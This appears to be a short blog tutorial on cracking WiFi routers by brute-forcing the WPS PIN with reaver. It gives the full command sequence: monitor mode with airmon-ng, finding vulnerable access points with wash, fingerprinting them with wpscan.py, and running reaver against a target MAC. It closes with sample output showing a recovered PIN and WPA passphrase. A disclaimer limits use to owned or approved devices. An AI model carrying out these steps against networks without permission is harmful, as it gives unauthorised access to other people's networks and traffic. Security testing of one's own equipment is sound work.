##DISCLAIMER## – as usual, only use on devices you have approval for or own.
I hadn’t looked much at reaver yet – although had been following the news since it was released in Dec. Reaver allows you to brute force the WPS 8 numeric digit pin (easy setup / config feature) on a WiFi AP rather than trying to brute force the PSK. WPS is enabled by default on most newer (last few years) consumer routers to get certification.
Main tools:
- reaver (crack AP) & wash (identify AP vuln to WPS brute forcing)
- the python script wpscan.py (circa 2009) allows you to fingerprint the AP (Make / Model / Serial etc) that has WPS enabled
Go here & download reaver 1.4 (latest at time of writing) – don’t just apt-get install as you don’t get wash
http://code.google.com/p/reaver-wps/downloads/list
http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz&can=2&q=
Do the install dance on your distro (works on BT5r1)
# tar zxvf reaver-1.4.tar.gz
# ./config
# make
# make install
You can also use a fun little python script called wpscan.py (not to be confused with the WordPress tool) to fingerprint the AP
http://www.sourcesec.com/category/tools/
Step 1: Interface into monitor mode
# airmon-ng start wlan0
Step 2: Identify a WPS enabled (vulnerable) AP using wash included with reaver
# wash –i mon0
Step 3: Fingerprint with wpscan.py
# ./wpscan.py –i mon0
Step 4: run reaver against it …… grab a coffee / lunch / sleep – can take several hours to brute force the WPS pin
# reaver -i mon0 -b -AP MAC ADDRESS- -v
This will [should] result in returning the pin & psk of the wifi router – you can simply then connect.
WPS PIN: ‘15736942’
WPA PSK: ‘somesecure&reallyl0ngpskhere’
AP SSID: ‘p0wn3d’
